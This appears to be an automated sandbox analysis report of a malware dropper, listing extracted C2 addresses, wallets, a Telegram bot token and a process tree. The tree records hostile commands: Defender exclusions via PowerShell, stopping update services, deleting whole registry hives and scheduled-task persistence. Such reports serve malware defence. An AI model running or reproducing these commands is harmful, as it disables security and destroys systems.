Resubmissions

14-11-2024 23:57

241114-3zzkpavhpf 10

14-11-2024 23:44

241114-3rj52avgna 10

14-11-2024 23:36

241114-3ln7ssvjfs 10

14-11-2024 23:24

241114-3dnajayler 10

14-11-2024 23:10

241114-25qpastqgt 10

Analysis

  • max time kernel
    139s
  • max time network
    204s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    14-11-2024 23:57

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

redline

Botnet

TG@CVV88888

C2

185.218.125.157:21441

Extracted

Family

phorphiex

C2

http://185.215.113.66

http://185.215.113.84

Attributes
  • mutex

    Klipux

Extracted

Family

stealc

Botnet

QLL2

C2

http://85.28.47.70

Attributes
  • url_path

    /744f169d372be841.php

Extracted

Family

phorphiex

C2

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3ESHude8zUHksQg1h6hHmzY79BS36L91Yn

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes
  • mutex

    753f85d83d

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

stealc

Botnet

penis

C2

http://185.196.9.140

Attributes
  • url_path

    /c3f845711fab35f8.php

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7673498966:AAE8RwQQVWIce7zc1tvOHxg7_EravC7Vqis/sendDocument?chat_id=621271611

Signatures

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Detects CryptBot payload 1 IoCs

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies security service 2 TTPs 1 IoCs
  • Phorphiex family
  • Phorphiex payload 2 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 16 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 32 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Manipulates Digital Signatures 1 TTPs 64 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 1 IoCs
  • Modifies system executable filetype association 2 TTPs 49 IoCs
  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3716
      • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
        "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4848
        • C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:4144
        • C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
          3⤵
          • Executes dropped EXE
          • Drops desktop.ini file(s)
          PID:2012
        • C:\Users\Admin\AppData\Local\Temp\Files\s.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:228
          • C:\Windows\sysvplervcs.exe
            C:\Windows\sysvplervcs.exe
            4⤵
            • Modifies security service
            • Windows security bypass
            • Checks computer location settings
            • Executes dropped EXE
            • Windows security modification
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4840
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2948
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4672
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3704
              • C:\Windows\SysWOW64\sc.exe
                sc stop UsoSvc
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2044
              • C:\Windows\SysWOW64\sc.exe
                sc stop WaaSMedicSvc
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2552
              • C:\Windows\SysWOW64\sc.exe
                sc stop wuauserv
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:1972
              • C:\Windows\SysWOW64\sc.exe
                sc stop DoSvc
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2944
              • C:\Windows\SysWOW64\sc.exe
                sc stop BITS /wait
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:1304
            • C:\Users\Admin\AppData\Local\Temp\3210330757.exe
              C:\Users\Admin\AppData\Local\Temp\3210330757.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1380
              • C:\Users\Admin\AppData\Local\Temp\889914022.exe
                C:\Users\Admin\AppData\Local\Temp\889914022.exe
                6⤵
                  PID:952
                  • C:\Windows\splwow64.exe
                    C:\Windows\splwow64.exe 12288
                    7⤵
                      PID:3696
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 1432
                    6⤵
                    • Program crash
                    PID:3940
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 1432
                    6⤵
                    • Program crash
                    PID:1304
                • C:\Users\Admin\AppData\Local\Temp\1186626615.exe
                  C:\Users\Admin\AppData\Local\Temp\1186626615.exe
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:2316
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2004
                    • C:\Windows\system32\reg.exe
                      reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                      7⤵
                        PID:252
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4320
                      • C:\Windows\system32\schtasks.exe
                        schtasks /delete /f /tn "Windows Upgrade Manager"
                        7⤵
                          PID:1520
                    • C:\Users\Admin\AppData\Local\Temp\1320819612.exe
                      C:\Users\Admin\AppData\Local\Temp\1320819612.exe
                      5⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:3044
                    • C:\Users\Admin\AppData\Local\Temp\3081912714.exe
                      C:\Users\Admin\AppData\Local\Temp\3081912714.exe
                      5⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2548
                      • C:\Users\Admin\AppData\Local\Temp\3154139472.exe
                        C:\Users\Admin\AppData\Local\Temp\3154139472.exe
                        6⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2556
                • C:\Users\Admin\AppData\Local\Temp\Files\surfex.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\surfex.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4560
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies system certificate store
                    PID:572
                • C:\Users\Admin\AppData\Local\Temp\Files\random.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2044
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                    4⤵
                    • Uses browser remote debugging
                    PID:4976
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffbbbf5cc40,0x7ffbbbf5cc4c,0x7ffbbbf5cc58
                      5⤵
                        PID:4380
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,14438500193528549902,17351070872354431004,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1940 /prefetch:2
                        5⤵
                          PID:232
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1728,i,14438500193528549902,17351070872354431004,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2168 /prefetch:3
                          5⤵
                            PID:524
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1300,i,14438500193528549902,17351070872354431004,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2208 /prefetch:8
                            5⤵
                              PID:4756
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,14438500193528549902,17351070872354431004,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3136 /prefetch:1
                              5⤵
                              • Uses browser remote debugging
                              PID:3892
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,14438500193528549902,17351070872354431004,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3152 /prefetch:1
                              5⤵
                              • Uses browser remote debugging
                              PID:4020
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3652,i,14438500193528549902,17351070872354431004,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3176 /prefetch:1
                              5⤵
                              • Uses browser remote debugging
                              PID:2496
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 1020
                            4⤵
                            • Program crash
                            PID:4252
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 956
                            4⤵
                            • Program crash
                            PID:4052
                        • C:\Users\Admin\AppData\Local\Temp\Files\343dsxs.exe
                          "C:\Users\Admin\AppData\Local\Temp\Files\343dsxs.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:1308
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            4⤵
                              PID:2308
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              4⤵
                                PID:2124
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                4⤵
                                  PID:4136
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2624
                              • C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"
                                3⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:4864
                                • C:\Users\Admin\AppData\Local\Temp\819525829.exe
                                  C:\Users\Admin\AppData\Local\Temp\819525829.exe
                                  4⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Drops file in Windows directory
                                  • System Location Discovery: System Language Discovery
                                  PID:2988
                                  • C:\Windows\sysnldcvmr.exe
                                    C:\Windows\sysnldcvmr.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: SetClipboardViewer
                                    PID:3948
                                    • C:\Users\Admin\AppData\Local\Temp\337141775.exe
                                      C:\Users\Admin\AppData\Local\Temp\337141775.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:2544
                                    • C:\Users\Admin\AppData\Local\Temp\2357524481.exe
                                      C:\Users\Admin\AppData\Local\Temp\2357524481.exe
                                      6⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4928
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                        7⤵
                                          PID:2520
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                            8⤵
                                              PID:3604
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                            7⤵
                                              PID:868
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /delete /f /tn "Windows Upgrade Manager"
                                                8⤵
                                                  PID:1484
                                            • C:\Users\Admin\AppData\Local\Temp\2696613756.exe
                                              C:\Users\Admin\AppData\Local\Temp\2696613756.exe
                                              6⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:1756
                                            • C:\Users\Admin\AppData\Local\Temp\56612674.exe
                                              C:\Users\Admin\AppData\Local\Temp\56612674.exe
                                              6⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:2148
                                      • C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:3636
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2308
                                      • C:\Users\Admin\AppData\Local\Temp\Files\whiteheroin.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Files\whiteheroin.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of SetThreadContext
                                        • System Location Discovery: System Language Discovery
                                        PID:4408
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4524
                                      • C:\Users\Admin\AppData\Local\Temp\Files\lum250.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Files\lum250.exe"
                                        3⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1564
                                      • C:\Users\Admin\AppData\Local\Temp\Files\DeliciousPart.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Files\DeliciousPart.exe"
                                        3⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Drops file in Windows directory
                                        • System Location Discovery: System Language Discovery
                                        PID:1548
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c move Tall Tall.bat & Tall.bat
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:996
                                          • C:\Windows\SysWOW64\tasklist.exe
                                            tasklist
                                            5⤵
                                            • Enumerates processes with tasklist
                                            • System Location Discovery: System Language Discovery
                                            PID:4092
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /I "wrsa opssvc"
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:228
                                          • C:\Windows\SysWOW64\tasklist.exe
                                            tasklist
                                            5⤵
                                            • Enumerates processes with tasklist
                                            • System Location Discovery: System Language Discovery
                                            PID:1988
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2664
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c md 349877
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4628
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /V "ORDINANCECHILDHOODCONVERTENDORSED" Booty
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1168
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c copy /b ..\Norwegian + ..\Mysql + ..\Tours + ..\Awareness + ..\Picking K
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5116
                                          • C:\Users\Admin\AppData\Local\Temp\349877\Faced.pif
                                            Faced.pif K
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4900
                                            • C:\Windows\SYSTEM32\schtasks.exe
                                              schtasks.exe /create /tn "BioMind" /tr "wscript //B 'C:\Users\Admin\AppData\Local\BioTech Dynamics\BioMind.js'" /sc onlogon /F /RL HIGHEST
                                              6⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:3328
                                            • C:\Users\Admin\AppData\Local\Temp\349877\RegAsm.exe
                                              C:\Users\Admin\AppData\Local\Temp\349877\RegAsm.exe
                                              6⤵
                                                PID:5372
                                              • C:\Users\Admin\AppData\Local\Temp\349877\RegAsm.exe
                                                C:\Users\Admin\AppData\Local\Temp\349877\RegAsm.exe
                                                6⤵
                                                  PID:5832
                                              • C:\Windows\SysWOW64\choice.exe
                                                choice /d y /t 15
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2284
                                          • C:\Users\Admin\AppData\Local\Temp\Files\crypted8888.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Files\crypted8888.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            PID:3900
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3676
                                          • C:\Users\Admin\AppData\Local\Temp\Files\hell9o.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Files\hell9o.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            PID:4860
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\regdel.CMD
                                              4⤵
                                                PID:868
                                                • C:\Windows\system32\reg.exe
                                                  reg DELETE HKEY_CLASSES_ROOT /f
                                                  5⤵
                                                  • Modifies system executable filetype association
                                                  • Modifies registry class
                                                  PID:4332
                                                • C:\Windows\system32\reg.exe
                                                  reg DELETE HKEY_CURRENT_USER /f
                                                  5⤵
                                                  • Boot or Logon Autostart Execution: Active Setup
                                                  • Manipulates Digital Signatures
                                                  • Modifies system executable filetype association
                                                  • Adds Run key to start application
                                                  • Modifies Internet Explorer settings
                                                  • Modifies registry class
                                                  PID:3900
                                                • C:\Windows\system32\reg.exe
                                                  reg DELETE HKEY_LOCAL_MACHINE /f
                                                  5⤵
                                                  • Boot or Logon Autostart Execution: Active Setup
                                                  • Manipulates Digital Signatures
                                                  • Modifies system executable filetype association
                                                  • Event Triggered Execution: Netsh Helper DLL
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  • Modifies Internet Explorer settings
                                                  • Modifies registry class
                                                  PID:3524
                                                • C:\Windows\system32\reg.exe
                                                  reg DELETE HKEY_USERS /f
                                                  5⤵
                                                    PID:5760
                                                  • C:\Windows\system32\reg.exe
                                                    reg DELETE HKEY_CURRENT_CONFIG /f
                                                    5⤵
                                                      PID:5748
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\regdel.CMD
                                                    4⤵
                                                      PID:5740
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
